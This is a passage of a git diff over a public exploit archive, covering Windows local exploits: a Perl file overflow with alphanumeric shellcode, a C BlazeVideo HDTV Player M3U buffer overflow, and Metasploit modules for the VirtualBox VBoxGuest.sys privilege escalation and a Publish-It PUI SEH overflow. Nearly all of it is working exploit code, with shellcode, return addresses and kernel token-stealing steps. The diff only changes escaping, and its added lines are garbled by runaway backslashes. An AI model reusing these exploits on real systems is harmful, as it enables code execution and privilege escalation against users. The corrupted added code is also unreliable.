-"\x6c\x49\x73\x74\x34\x64\x56\x44\x63\x6b\x53\x6b\x43\x51" .
-"\x61\x49\x43\x6a\x66\x31\x4b\x4f\x4b\x50\x31\x48\x71\x4f" .
-"\x33\x6a\x6c\x4b\x32\x32\x48\x6b\x6e\x66\x31\x4d\x51\x7a" .
-"\x76\x61\x6c\x4d\x6e\x65\x4f\x49\x37\x70\x67\x70\x63\x30" .
-"\x72\x70\x70\x68\x44\x71\x4e\x6b\x32\x4f\x6b\x37\x39\x6f" .
-"\x38\x55\x4f\x4b\x7a\x50\x6d\x65\x6c\x62\x70\x56\x55\x38" .
-"\x6f\x56\x4d\x45\x6d\x6d\x6f\x6d\x39\x6f\x4b\x65\x55\x6c" .
-"\x74\x46\x63\x4c\x55\x5a\x6d\x50\x49\x6b\x6b\x50\x64\x35" .
-"\x67\x75\x6f\x4b\x72\x67\x57\x63\x71\x62\x62\x4f\x30\x6a" .
-"\x57\x70\x36\x33\x69\x6f\x68\x55\x73\x53\x61\x71\x72\x4c" .
-"\x30\x63\x44\x6e\x70\x65\x32\x58\x32\x45\x65\x50\x41\x41";
-$junk .= $eip . "\x90" x 50 . $shellcode ;
+$shellcode = \"\\x89\\xe7\\xda\\xd4\\xd9\\x77\\xf4\\x5b\\x53\\x59\\x49\\x49\\x49\\x49\" .
+\"\\x49\\x49\\x49\\x49\\x49\\x49\\x43\\x43\\x43\\x43\\x43\\x43\\x37\\x51\" .
+\"\\x5a\\x6a\\x41\\x58\\x50\\x30\\x41\\x30\\x41\\x6b\\x41\\x41\\x51\\x32\" .
+\"\\x41\\x42\\x32\\x42\\x42\\x30\\x42\\x42\\x41\\x42\\x58\\x50\\x38\\x41\" .
+\"\\x42\\x75\\x4a\\x49\\x49\\x6c\\x78\\x68\\x4d\\x59\\x67\\x70\\x77\\x70\" .
+\"\\x43\\x30\\x65\\x30\\x6b\\x39\\x5a\\x45\\x76\\x51\\x59\\x42\\x52\\x44\" .
+\"\\x6e\\x6b\\x71\\x42\\x46\\x50\\x6e\\x6b\\x56\\x32\\x36\\x6c\\x4e\\x6b\" .
+\"\\x53\\x62\\x66\\x74\\x6c\\x4b\\x33\\x42\\x36\\x48\\x34\\x4f\\x6f\\x47\" .
+\"\\x51\\x5a\\x75\\x76\\x75\\x61\\x39\\x6f\\x45\\x61\\x79\\x50\\x6c\\x6c\" .
+\"\\x67\\x4c\\x70\\x61\\x53\\x4c\\x66\\x62\\x36\\x4c\\x57\\x50\\x5a\\x61\" .
+\"\\x7a\\x6f\\x46\\x6d\\x63\\x31\\x5a\\x67\\x4a\\x42\\x4a\\x50\\x72\\x72\" .
+\"\\x33\\x67\\x6c\\x4b\\x76\\x32\\x76\\x70\\x6c\\x4b\\x53\\x72\\x35\\x6c\" .
+\"\\x46\\x61\\x4a\\x70\\x6e\\x6b\\x31\\x50\\x50\\x78\\x6b\\x35\\x39\\x50\" .
+\"\\x54\\x34\\x62\\x6a\\x67\\x71\\x4e\\x30\\x30\\x50\\x6c\\x4b\\x52\\x68\" .
+\"\\x35\\x48\\x6e\\x6b\\x70\\x58\\x51\\x30\\x43\\x31\\x6a\\x73\\x5a\\x43\" .
+\"\\x55\\x6c\\x43\\x79\\x6c\\x4b\\x37\\x44\\x4c\\x4b\\x37\\x71\\x69\\x46\" .
+\"\\x36\\x51\\x39\\x6f\\x46\\x51\\x4f\\x30\\x4e\\x4c\\x4f\\x31\\x5a\\x6f\" .
+\"\\x64\\x4d\\x37\\x71\\x5a\\x67\\x46\\x58\\x79\\x70\\x43\\x45\\x4b\\x44\" .
+\"\\x77\\x73\\x31\\x6d\\x4b\\x48\\x47\\x4b\\x51\\x6d\\x46\\x44\\x50\\x75\" .
+\"\\x39\\x72\\x30\\x58\\x6c\\x4b\\x53\\x68\\x75\\x74\\x35\\x51\\x59\\x43\" .
+\"\\x65\\x36\\x6c\\x4b\\x36\\x6c\\x52\\x6b\\x6e\\x6b\\x42\\x78\\x47\\x6c\" .
+\"\\x63\\x31\\x48\\x53\\x6e\\x6b\\x63\\x34\\x4e\\x6b\\x56\\x61\\x7a\\x70\" .
+\"\\x6c\\x49\\x73\\x74\\x34\\x64\\x56\\x44\\x63\\x6b\\x53\\x6b\\x43\\x51\" .
+\"\\x61\\x49\\x43\\x6a\\x66\\x31\\x4b\\x4f\\x4b\\x50\\x31\\x48\\x71\\x4f\" .
+\"\\x33\\x6a\\x6c\\x4b\\x32\\x32\\x48\\x6b\\x6e\\x66\\x31\\x4d\\x51\\x7a\" .
+\"\\x76\\x61\\x6c\\x4d\\x6e\\x65\\x4f\\x49\\x37\\x70\\x67\\x70\\x63\\x30\" .
+\"\\x72\\x70\\x70\\x68\\x44\\x71\\x4e\\x6b\\x32\\x4f\\x6b\\x37\\x39\\x6f\" .
+\"\\x38\\x55\\x4f\\x4b\\x7a\\x50\\x6d\\x65\\x6c\\x62\\x70\\x56\\x55\\x38\" .
+\"\\x6f\\x56\\x4d\\x45\\x6d\\x6d\\x6f\\x6d\\x39\\x6f\\x4b\\x65\\x55\\x6c\" .
+\"\\x74\\x46\\x63\\x4c\\x55\\x5a\\x6d\\x50\\x49\\x6b\\x6b\\x50\\x64\\x35\" .
+\"\\x67\\x75\\x6f\\x4b\\x72\\x67\\x57\\x63\\x71\\x62\\x62\\x4f\\x30\\x6a\" .
+\"\\x57\\x70\\x36\\x33\\x69\\x6f\\x68\\x55\\x73\\x53\\x61\\x71\\x72\\x4c\" .
+\"\\x30\\x63\\x44\\x6e\\x70\\x65\\x32\\x58\\x32\\x45\\x65\\x50\\x41\\x41\";
+$junk .= $eip . \"\\x90\" x 50 . $shellcode ;
 ###############################################################
-open(FILE,">$file");
+open(FILE,\">$file\");
 print FILE $junk;
 close(FILE);
 ###############################################################
diff --git a/platforms/windows/local/2880.c b/platforms/windows/local/2880.c
index b7f9bf9a9..2be74ef6d 100755
--- a/platforms/windows/local/2880.c
+++ b/platforms/windows/local/2880.c
@@ -9,7 +9,7 @@ attacker to execute code in the context of the player.
 This exploit should also work for BlazeDVD v5.0, but i havent gotten
 around to testing it.
 
-C:\ + [BUFFER x 257 bytes] + [JMP] + [16 Garbage bytes] + [SHELLCODE in ESP]
+C:\\ + [BUFFER x 257 bytes] + [JMP] + [16 Garbage bytes] + [SHELLCODE in ESP]
 
 
 Happy Hunting and Happy Holidays to everyone
@@ -38,11 +38,11 @@ int main(int argc, char *argv[])
 
        /* Executes Calc.exe Alpha2 Shellcode Provided by Expanders  */
        unsigned char scode[] =
-       "TYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJI"
-       "YlHhQTs0s0c0LKcuwLLK1ls52Xs1JONkRofxNkcoUpUQZKCylK4tLKuQxnTqo0LYnLMTkpptUWiQ9ZdM"
-       "5QO2JKZT5k2tUtUTPuKULKQOfDc1zKPfNkflrkNkSowlvaZKLK5LlKgqxkMYqL14wtYSFQkpcTNkQPtp"
-       "LEiPd8VlNkqPVllKPp7lNMLK0htHjKuYnkMPnP7pc05PLKsXUlsovQxvU0PVOy9hlCo0SKRpsXhoxNip"
-       "sPu8LX9nMZvnv79oM7sSU1rLsSdnu5rX3UuPA";
+       \"TYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJI\"
+       \"YlHhQTs0s0c0LKcuwLLK1ls52Xs1JONkRofxNkcoUpUQZKCylK4tLKuQxnTqo0LYnLMTkpptUWiQ9ZdM\"
+       \"5QO2JKZT5k2tUtUTPuKULKQOfDc1zKPfNkflrkNkSowlvaZKLK5LlKgqxkMYqL14wtYSFQkpcTNkQPtp\"
+       \"LEiPd8VlNkqPVllKPp7lNMLK0htHjKuYnkMPnP7pc05PLKsXUlsovQxvU0PVOy9hlCo0SKRpsXhoxNip\"
+       \"sPu8LX9nMZvnv79oM7sSU1rLsSdnu5rX3UuPA\";
 
 
        /* replace it with your own shellcode :) */
@@ -50,44 +50,44 @@ int main(int argc, char *argv[])
 
        int JMP, x;
 
-       printf("\n======================================================================\n");
-       printf("BlazeVideo HDTV Player <= v2.3 M3U Buffer Overflow Exploit\n");
-       printf("Discovered and Coded By: Greg Linares \n");
-       printf("Usage: %s  \n", argv[0]);
-       printf("\n JMP Options\n");
-       printf("1 = English Windows XP SP 2 User32.dll \n");
-       printf("2 = English Windows XP SP 1 User32.dll \n");
-       printf("3 = English Windows 2003 SP0 and SP1 User32.dll \n");
-       printf("4 = English Windows 2000 SP 4 User32.dll  \n");
-       printf("5 = French Windows XP Pro SP2   \n");
-       printf("6 = German/Italian/Dutch/Polish Windows XP SP2   \n");
-       printf("7 = Spainish Windows XP Pro SP2  \n");
-       printf("8 = French/Italian/German/Polish/Dutch Windows 2000 Pro SP4 \n");
-       printf("9 = French/Italian/Chineese Windows 2000 Server SP4 \n");
-       printf("====================================================================\n\n\n");
+       printf(\"\\n======================================================================\\n\");
+       printf(\"BlazeVideo HDTV Player <= v2.3 M3U Buffer Overflow Exploit\\n\");
+       printf(\"Discovered and Coded By: Greg Linares \\n\");
+       printf(\"Usage: %s  \\n\", argv[0]);
+       printf(\"\\n JMP Options\\n\");
+       printf(\"1 = English Windows XP SP 2 User32.dll \\n\");
+       printf(\"2 = English Windows XP SP 1 User32.dll \\n\");
+       printf(\"3 = English Windows 2003 SP0 and SP1 User32.dll \\n\");
+       printf(\"4 = English Windows 2000 SP 4 User32.dll  \\n\");
+       printf(\"5 = French Windows XP Pro SP2   \\n\");
+       printf(\"6 = German/Italian/Dutch/Polish Windows XP SP2   \\n\");
+       printf(\"7 = Spainish Windows XP Pro SP2  \\n\");
+       printf(\"8 = French/Italian/German/Polish/Dutch Windows 2000 Pro SP4 \\n\");
+       printf(\"9 = French/Italian/Chineese Windows 2000 Server SP4 \\n\");
+       printf(\"====================================================================\\n\\n\\n\");
 
 
        /* thanks metasploit and jerome for opcodes */
 
        if (argc < 2) {
-               printf("Invalid Number Of Arguments\n");
+               printf(\"Invalid Number Of Arguments\\n\");
                return 1;
        }
 
 
-       Exploit = fopen(argv[1],"w");
+       Exploit = fopen(argv[1],\"w\");
    if ( !Exploit )
    {
-       printf("\nCouldn't Open File!");
+       printf(\"\\nCouldn\'t Open File!\");
        return 1;
    }
 
 
 
-       fputs("C:\\", Exploit);
+       fputs(\"C:\\\\\", Exploit);
 
        for (x=0;x<257;x++) {
-               fputs("A", Exploit);
+               fputs(\"A\", Exploit);
        }
 
 
@@ -100,56 +100,56 @@ int main(int argc, char *argv[])
        }
        switch(JMP) {
                case 1:
-                       printf("Using English Windows XP SP2 JMP...\n");
-                       fputs("\xbc\x41\xdb\x77", Exploit);
+                       printf(\"Using English Windows XP SP2 JMP...\\n\");
+                       fputs(\"\\xbc\\x41\\xdb\\x77\", Exploit);
                        break;
                case 2:
-                       printf("Using English Windows XP SP1 JMP...\n");
-                       fputs("\xfc\x18\xd7\x77", Exploit);
+                       printf(\"Using English Windows XP SP1 JMP...\\n\");
+                       fputs(\"\\xfc\\x18\\xd7\\x77\", Exploit);
                        break;
                case 3:
-                       printf("Using English Windows 2003 SP0 & SP1 JMP...\n");
-                       fputs("\xdc\x4a\xd7\x77", Exploit);
+                       printf(\"Using English Windows 2003 SP0 & SP1 JMP...\\n\");
+                       fputs(\"\\xdc\\x4a\\xd7\\x77\", Exploit);
                        break;
                case 4:
-                       printf("Using English Windows 2000 SP 4 JMP...\n");
-                       fputs("\x56\xc2\xe3\x77", Exploit);
+                       printf(\"Using English Windows 2000 SP 4 JMP...\\n\");
+                       fputs(\"\\x56\\xc2\\xe3\\x77\", Exploit);
                        break;
                case 5:
-                       printf("Using French Windows XP SP 2 JMP...\n");
-                       fputs("\x9f\x51\xd8\x77", Exploit);
+                       printf(\"Using French Windows XP SP 2 JMP...\\n\");
+                       fputs(\"\\x9f\\x51\\xd8\\x77\", Exploit);
                        break;
                case 6:
-                       printf("Using German/Italian/Dutch/Polish Windows XP SP 2 JMP...\n");
-                       fputs("\xa0\x73\xd8\x77", Exploit);
+                       printf(\"Using German/Italian/Dutch/Polish Windows XP SP 2 JMP...\\n\");
+                       fputs(\"\\xa0\\x73\\xd8\\x77\", Exploit);
                        break;
                case 7:
-                       printf("Using Spainish Windows XP SP 2 JMP...\n");
-                       fputs("\x2f\x93\xd9\x77", Exploit);
+                       printf(\"Using Spainish Windows XP SP 2 JMP...\\n\");
+                       fputs(\"\\x2f\\x93\\xd9\\x77\", Exploit);
                        break;
                case 8:
-                       printf("Using French/Italian/German/Polish/Dutch Windows 2000 Pro SP 4 JMP...\n");
-                       fputs("\x29\x4c\xe0\x77", Exploit);
+                       printf(\"Using French/Italian/German/Polish/Dutch Windows 2000 Pro SP 4 JMP...\\n\");
+                       fputs(\"\\x29\\x4c\\xe0\\x77\", Exploit);
                        break;
                case 9:
-                       printf("Using French/Italian/Chineese Windows 2000 Server SP 4 JMP...\n");
-                       fputs("\x29\x4c\xdf\x77", Exploit);
+                       printf(\"Using French/Italian/Chineese Windows 2000 Server SP 4 JMP...\\n\");
+                       fputs(\"\\x29\\x4c\\xdf\\x77\", Exploit);
                        break;
 
        }
 
        for (x=0;x<16;x++) {
-               fputs("\x58", Exploit);
+               fputs(\"\\x58\", Exploit);
        }
        fputs(scode, Exploit);
-       fputs("\r\n", Exploit);
+       fputs(\"\\r\\n\", Exploit);
 
 
-       printf("Exploit Succeeded...\n Output File: %s\n\n", argv[1]);
+       printf(\"Exploit Succeeded...\\n Output File: %s\\n\\n\", argv[1]);
 
 
-       printf("Exploit Coded by Greg Linares (GLinares.code[at]gmail[dot]com)\n");
-       printf("Greetz to: Everyone at EEye, Metasploit Crew, Jerome Athias and Expanders - Thanks For The Ideas, Tools and Alpha2 Shell Code\n");
+       printf(\"Exploit Coded by Greg Linares (GLinares.code[at]gmail[dot]com)\\n\");
+       printf(\"Greetz to: Everyone at EEye, Metasploit Crew, Jerome Athias and Expanders - Thanks For The Ideas, Tools and Alpha2 Shell Code\\n\");
        fclose(Exploit);
        return 0;
 }
diff --git a/platforms/windows/local/34333.rb b/platforms/windows/local/34333.rb
index 534e757e0..01b083c4e 100755
--- a/platforms/windows/local/34333.rb
+++ b/platforms/windows/local/34333.rb
@@ -3,9 +3,9 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
-require 'msf/core'
-require 'msf/core/exploit/local/windows_kernel'
-require 'rex'
+require \'msf/core\'
+require \'msf/core/exploit/local/windows_kernel\'
+require \'rex\'
 
 class Metasploit3 < Msf::Exploit::Local
   Rank = AverageRanking
@@ -18,96 +18,96 @@ class Metasploit3 < Msf::Exploit::Local
 
   def initialize(info={})
     super(update_info(info, {
-      'Name'          => 'VirtualBox Guest Additions VBoxGuest.sys Privilege Escalation',
-      'Description'    => %q{
+      \'Name\'          => \'VirtualBox Guest Additions VBoxGuest.sys Privilege Escalation\',
+      \'Description\'    => %q{
         A vulnerability within the VBoxGuest driver allows an attacker to inject memory they
         control into an arbitrary location they define. This can be used by an attacker to
         overwrite HalDispatchTable+0x4 and execute arbitrary code by subsequently calling
         NtQueryIntervalProfile on Windows XP SP3 systems. This has been tested with VBoxGuest
         Additions up to 4.3.10r93012.
       },
-      'License'       => MSF_LICENSE,
-      'Author'        =>
+      \'License\'       => MSF_LICENSE,
+      \'Author\'        =>
         [
-          'Matt Bergin ', # Vulnerability discovery and PoC
-          'Jay Smith ' # MSF module
+          \'Matt Bergin \', # Vulnerability discovery and PoC
+          \'Jay Smith \' # MSF module
         ],
-      'Arch'          => ARCH_X86,
-      'Platform'      => 'win',
-      'SessionTypes'  => [ 'meterpreter' ],
-      'DefaultOptions' =>
+      \'Arch\'          => ARCH_X86,
+      \'Platform\'      => \'win\',
+      \'SessionTypes\'  => [ \'meterpreter\' ],
+      \'DefaultOptions\' =>
         {
-          'EXITFUNC' => 'thread',
+          \'EXITFUNC\' => \'thread\',
         },
-      'Targets'       =>
+      \'Targets\'       =>
         [
-          ['Windows XP SP3',
+          [\'Windows XP SP3\',
             {
-              'HaliQuerySystemInfo' => 0x16bba,
-              '_KPROCESS'  => "\x44",
-              '_TOKEN'     => "\xc8",
-              '_UPID'      => "\x84",
-              '_APLINKS'   => "\x88"
+              \'HaliQuerySystemInfo\' => 0x16bba,
+              \'_KPROCESS\'  => \"\\x44\",
+              \'_TOKEN\'     => \"\\xc8\",
+              \'_UPID\'      => \"\\x84\",
+              \'_APLINKS\'   => \"\\x88\"
             }
           ]
         ],
-      'References'    =>
+      \'References\'    =>
         [
-          ['CVE', '2014-2477'],
-          ['URL', 'https://www.korelogic.com/Resources/Advisories/KL-001-2014-001.txt']
+          [\'CVE\', \'2014-2477\'],
+          [\'URL\', \'https://www.korelogic.com/Resources/Advisories/KL-001-2014-001.txt\']
         ],
-      'DisclosureDate'=> 'Jul 15 2014',
-      'DefaultTarget' => 0
+      \'DisclosureDate\'=> \'Jul 15 2014\',
+      \'DefaultTarget\' => 0
     }))
 
   end
 
   def fill_memory(proc, address, length, content)
 
-    session.railgun.ntdll.NtAllocateVirtualMemory(-1, [ address ].pack("L"), nil, [ length ].pack("L"), "MEM_RESERVE|MEM_COMMIT|MEM_TOP_DOWN", "PAGE_EXECUTE_READWRITE")
+    session.railgun.ntdll.NtAllocateVirtualMemory(-1, [ address ].pack(\"L\"), nil, [ length ].pack(\"L\"), \"MEM_RESERVE|MEM_COMMIT|MEM_TOP_DOWN\", \"PAGE_EXECUTE_READWRITE\")
 
     if not proc.memory.writable?(address)
-      vprint_error("Failed to allocate memory")
+      vprint_error(\"Failed to allocate memory\")
       return nil
     else
-      vprint_good("#{address} is now writable")
+      vprint_good(\"#{address} is now writable\")
     end
 
     result = proc.memory.write(address, content)
 
     if result.nil?
-      vprint_error("Failed to write contents to memory")
+      vprint_error(\"Failed to write contents to memory\")
       return nil
     else
-      vprint_good("Contents successfully written to 0x#{address.to_s(16)}")
+      vprint_good(\"Contents successfully written to 0x#{address.to_s(16)}\")
     end
 
     return address
   end
 
   def check
-    if sysinfo["Architecture"] =~ /wow64/i or sysinfo["Architecture"] =~ /x64/
+    if sysinfo[\"Architecture\"] =~ /wow64/i or sysinfo[\"Architecture\"] =~ /x64/
       return Exploit::CheckCode::Safe
     end
 
-    handle = open_device('\\\\.\\vboxguest', 'FILE_SHARE_WRITE|FILE_SHARE_READ', 0, 'OPEN_EXISTING')
+    handle = open_device(\'\\\\\\\\.\\\\vboxguest\', \'FILE_SHARE_WRITE|FILE_SHARE_READ\', 0, \'OPEN_EXISTING\')
     if handle.nil?
       return Exploit::CheckCode::Safe
     end
     session.railgun.kernel32.CloseHandle(handle)
 
-    os = sysinfo["OS"]
+    os = sysinfo[\"OS\"]
     unless (os =~ /windows xp.*service pack 3/i)
       return Exploit::CheckCode::Safe
     end
 
-    file_path = expand_path("%windir%") << "\\system32\\drivers\\vboxguest.sys"
+    file_path = expand_path(\"%windir%\") << \"\\\\system32\\\\drivers\\\\vboxguest.sys\"
     unless file?(file_path)
       return Exploit::CheckCode::Unknown
     end
 
     major, minor, build, revision, branch = file_version(file_path)
-    vprint_status("vboxguest.sys file version: #{major}.#{minor}.#{build}.#{revision} branch: #{branch}")
+    vprint_status(\"vboxguest.sys file version: #{major}.#{minor}.#{build}.#{revision} branch: #{branch}\")
 
     unless (major == 4)
       return Exploit::CheckCode::Safe
@@ -129,84 +129,84 @@ class Metasploit3 < Msf::Exploit::Local
 
   def exploit
     if is_system?
-      fail_with(Exploit::Failure::None, 'Session is already elevated')
+      fail_with(Exploit::Failure::None, \'Session is already elevated\')
     end
 
-    if sysinfo["Architecture"] =~ /wow64/i
-      fail_with(Failure::NoTarget, "Running against WOW64 is not supported")
-    elsif sysinfo["Architecture"] =~ /x64/
-      fail_with(Failure::NoTarget, "Running against 64-bit systems is not supported")
+    if sysinfo[\"Architecture\"] =~ /wow64/i
+      fail_with(Failure::NoTarget, \"Running against WOW64 is not supported\")
+    elsif sysinfo[\"Architecture\"] =~ /x64/
+      fail_with(Failure::NoTarget, \"Running against 64-bit systems is not supported\")
     end
 
     unless check == Exploit::CheckCode::Vulnerable
-      fail_with(Exploit::Failure::NotVulnerable, "Exploit not available on this system")
+      fail_with(Exploit::Failure::NotVulnerable, \"Exploit not available on this system\")
     end
 
-    handle = open_device('\\\\.\\vboxguest', 'FILE_SHARE_WRITE|FILE_SHARE_READ', 0, 'OPEN_EXISTING')
+    handle = open_device(\'\\\\\\\\.\\\\vboxguest\', \'FILE_SHARE_WRITE|FILE_SHARE_READ\', 0, \'OPEN_EXISTING\')
     if handle.nil?
-      fail_with(Failure::NoTarget, "Unable to open \\\\.\\vboxguest device")
+      fail_with(Failure::NoTarget, \"Unable to open \\\\\\\\.\\\\vboxguest device\")
     end
 
-    print_status("Disclosing the HalDispatchTable address...")
+    print_status(\"Disclosing the HalDispatchTable address...\")
     hal_dispatch_table = find_haldispatchtable
     if hal_dispatch_table.nil?
       session.railgun.kernel32.CloseHandle(handle)
-      fail_with(Failure::Unknown, "Filed to disclose HalDispatchTable")
+      fail_with(Failure::Unknown, \"Filed to disclose HalDispatchTable\")
     else
-      print_good("Address successfully disclosed.")
+      print_good(\"Address successfully disclosed.\")
     end
 
-    print_status('Getting the hal.dll base address...')
-    hal_info = find_sys_base('hal.dll')
-    fail_with(Failure::Unknown, 'Failed to disclose hal.dll base address') if hal_info.nil?
+    print_status(\'Getting the hal.dll base address...\')
+    hal_info = find_sys_base(\'hal.dll\')
+    fail_with(Failure::Unknown, \'Failed to disclose hal.dll base address\') if hal_info.nil?
 
     hal_base = hal_info[0]
-    print_good("hal.dll base address disclosed at 0x#{hal_base.to_s(16).rjust(8, '0')}")
-    hali_query_system_information = hal_base + target['HaliQuerySystemInfo']
+    print_good(\"hal.dll base address disclosed at 0x#{hal_base.to_s(16).rjust(8, \'0\')}\")
+    hali_query_system_information = hal_base + target[\'HaliQuerySystemInfo\']
 
-    print_status("Storing the shellcode in memory...")
+    print_status(\"Storing the shellcode in memory...\")
     this_proc = session.sys.process.open
 
-    restore_ptrs =  "\x31\xc0"                                         # xor eax, eax
-    restore_ptrs << "\xb8" + [hali_query_system_information].pack('V') # mov eax, offset hal!HaliQuerySystemInformation
-    restore_ptrs << "\xa3" + [hal_dispatch_table + 4].pack('V')        # mov dword ptr [nt!HalDispatchTable+0x4], eax
+    restore_ptrs =  \"\\x31\\xc0\"                                         # xor eax, eax
+    restore_ptrs << \"\\xb8\" + [hali_query_system_information].pack(\'V\') # mov eax, offset hal!HaliQuerySystemInformation
+    restore_ptrs << \"\\xa3\" + [hal_dispatch_table + 4].pack(\'V\')        # mov dword ptr [nt!HalDispatchTable+0x4], eax
 
     kernel_shell = token_stealing_shellcode(target)
     kernel_shell_address = 0x1
 
-    buf = "\x90" * 0x6000
-    buf[0, 56] = "\x50\x00\x00\x00" * 14
+    buf = \"\\x90\" * 0x6000
+    buf[0, 56] = \"\\x50\\x00\\x00\\x00\" * 14
     buf[0x5000, kernel_shell.length] = restore_ptrs + kernel_shell
 
     result = fill_memory(this_proc, kernel_shell_address, buf.length, buf)
     if result.nil?
       session.railgun.kernel32.CloseHandle(handle)
-      fail_with(Failure::Unknown, "Error while storing the kernel stager shellcode on memory")
+      fail_with(Failure::Unknown, \"Error while storing the kernel stager shellcode on memory\")
     else
-      print_good("Kernel stager successfully stored at 0x#{kernel_shell_address.to_s(16)}")
+      print_good(\"Kernel stager successfully stored at 0x#{kernel_shell_address.to_s(16)}\")
     end
 
-    print_status("Triggering the vulnerability, corrupting the HalDispatchTable...")
+    print_status(\"Triggering the vulnerability, corrupting the HalDispatchTable...\")
     session.railgun.ntdll.NtDeviceIoControlFile(handle, nil, nil, nil, 4, 0x22a040, 0x1, 140, hal_dispatch_table + 0x4 - 40, 0)
     session.railgun.kernel32.CloseHandle(handle)
 
-    print_status("Executing the Kernel Stager throw NtQueryIntervalProfile()...")
+    print_status(\"Executing the Kernel Stager throw NtQueryIntervalProfile()...\")
     session.railgun.ntdll.NtQueryIntervalProfile(2, 4)
 
-    print_status("Checking privileges after exploitation...")
+    print_status(\"Checking privileges after exploitation...\")
 
     unless is_system?
-      fail_with(Failure::Unknown, "The exploitation wasn't successful")
+      fail_with(Failure::Unknown, \"The exploitation wasn\'t successful\")
     else
-      print_good("Exploitation successful!")
+      print_good(\"Exploitation successful!\")
     end
 
     p = payload.encoded
-    print_status("Injecting #{p.length.to_s} bytes to memory and executing it...")
+    print_status(\"Injecting #{p.length.to_s} bytes to memory and executing it...\")
     if execute_shellcode(p)
-      print_good("Enjoy")
+      print_good(\"Enjoy\")
     else
-      fail_with(Failure::Unknown, "Error while executing the payload")
+      fail_with(Failure::Unknown, \"Error while executing the payload\")
     end
 
   end
diff --git a/platforms/windows/local/36437.rb b/platforms/windows/local/36437.rb
index e645babb3..209e4525c 100755
--- a/platforms/windows/local/36437.rb
+++ b/platforms/windows/local/36437.rb
@@ -3,7 +3,7 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
-require 'msf/core'
+require \\\\\\\'msf/core\\\\\\\'
 
 class Metasploit3 < Msf::Exploit::Remote
   Rank = NormalRanking
@@ -12,70 +12,70 @@ class Metasploit3 < Msf::Exploit::Remote
 
   def initialize(info = {})
     super(update_info(info,
-      'Name'    => 'Publish-It PUI Buffer Overflow (SEH)',
-      'Description'  => %q{
+      \\\\\\\'Name\\\\\\\'    => \\\\\\\'Publish-It PUI Buffer Overflow (SEH)\\\\\\\',
+      \\\\\\\'Description\\\\\\\'  => %q{
           This module exploits a stack based buffer overflow in Publish-It when
           processing a specially crafted .PUI file. This vulnerability could be
           exploited by a remote attacker to execute arbitrary code on the target
           machine by enticing a user of Publish-It to open a malicious .PUI file.
       },
-      'License'    => MSF_LICENSE,
-      'Author'    =>
+      \\\\\\\'License\\\\\\\'    => MSF_LICENSE,
+      \\\\\\\'Author\\\\\\\'    =>
         [
-          'Daniel Kazimirow',  # Original discovery
-          'Andrew Smith "jakx_"',  # Exploit and MSF Module
+          \\\\\\\'Daniel Kazimirow\\\\\\\',  # Original discovery
+          \\\\\\\'Andrew Smith \\\\\\\"jakx_\\\\\\\"\\\\\\\',  # Exploit and MSF Module
         ],
-      'References'  =>
+      \\\\\\\'References\\\\\\\'  =>
         [
-          [ 'OSVDB', '102911' ],
-          [ 'CVE', '2014-0980' ],
-          [ 'EDB', '31461' ]
+          [ \\\\\\\'OSVDB\\\\\\\', \\\\\\\'102911\\\\\\\' ],
+          [ \\\\\\\'CVE\\\\\\\', \\\\\\\'2014-0980\\\\\\\' ],
+          [ \\\\\\\'EDB\\\\\\\', \\\\\\\'31461\\\\\\\' ]
         ],
-      'DefaultOptions' =>
+      \\\\\\\'DefaultOptions\\\\\\\' =>
         {
-          'ExitFunction' => 'process',
+          \\\\\\\'ExitFunction\\\\\\\' => \\\\\\\'process\\\\\\\',
         },
-      'Platform'  => 'win',
-      'Payload'  =>
+      \\\\\\\'Platform\\\\\\\'  => \\\\\\\'win\\\\\\\',
+      \\\\\\\'Payload\\\\\\\'  =>
         {
-          'BadChars' => "\x00\x0b\x0a",
-          'DisableNops' => true,
-          'Space' => 377
+          \\\\\\\'BadChars\\\\\\\' => \\\\\\\"\\\\\\\\x00\\\\\\\\x0b\\\\\\\\x0a\\\\\\\",
+          \\\\\\\'DisableNops\\\\\\\' => true,
+          \\\\\\\'Space\\\\\\\' => 377
         },
-      'Targets'    =>
+      \\\\\\\'Targets\\\\\\\'    =>
         [
-          [ 'Publish-It 3.6d',
+          [ \\\\\\\'Publish-It 3.6d\\\\\\\',
             {
-              'Ret'     =>  0x0046e95a, #p/p/r | Publish.EXE
-              'Offset'  =>  1082
+              \\\\\\\'Ret\\\\\\\'     =>  0x0046e95a, #p/p/r | Publish.EXE
+              \\\\\\\'Offset\\\\\\\'  =>  1082
             }
           ],
         ],
-      'Privileged'  => false,
-      'DisclosureDate'  => 'Feb 5 2014',
-      'DefaultTarget'  => 0))
+      \\\\\\\'Privileged\\\\\\\'  => false,
+      \\\\\\\'DisclosureDate\\\\\\\'  => \\\\\\\'Feb 5 2014\\\\\\\',
+      \\\\\\\'DefaultTarget\\\\\\\'  => 0))
 
-    register_options([OptString.new('FILENAME', [ true, 'The file name.', 'msf.pui']),], self.class)
+    register_options([OptString.new(\\\\\\\'FILENAME\\\\\\\', [ true, \\\\\\\'The file name.\\\\\\\', \\\\\\\'msf.pui\\\\\\\']),], self.class)
 
   end
 
   def exploit
 
-    path = ::File.join(Msf::Config.data_directory, "exploits", "CVE-2014-0980.pui")
-    fd = File.open(path, "rb")
+    path = ::File.join(Msf::Config.data_directory, \\\\\\\"exploits\\\\\\\", \\\\\\\"CVE-2014-0980.pui\\\\\\\")
+    fd = File.open(path, \\\\\\\"rb\\\\\\\")
     template_data = fd.read(fd.stat.size)
     fd.close
 
     buffer = template_data
     buffer << make_nops(700)
     buffer << payload.encoded
-    buffer << make_nops(target['Offset']-payload.encoded.length-700-5)
-    buffer << Rex::Arch::X86.jmp('$-399') #long negative jump -399
-    buffer << Rex::Arch::X86.jmp_short('$-24') #nseh negative jump
+    buffer << make_nops(target[\\\\\\\'Offset\\\\\\\']-payload.encoded.length-700-5)
+    buffer << Rex::Arch::X86.jmp(\\\\\\\'$-399\\\\\\\') #long negative jump -399
+    buffer << Rex::Arch::X86.jmp_short(\\\\\\\'$-24\\\\\\\') #nseh negative jump
     buffer << make_nops(2)
-    buffer << [target.ret].pack("V")
+    buffer << [target.ret].pack(\\\\\\\"V\\\\\\\")
 
-    print_status("Creating '#{datastore['FILENAME']}' file ...")
+    print_status(\\\\\\\"Creating \\\\\\\'#{datastore[\\\\\\\'FILENAME\\\\\\\']}\\\\\\\' file ...\\\\\\\")
     file_create(buffer)
 
   end
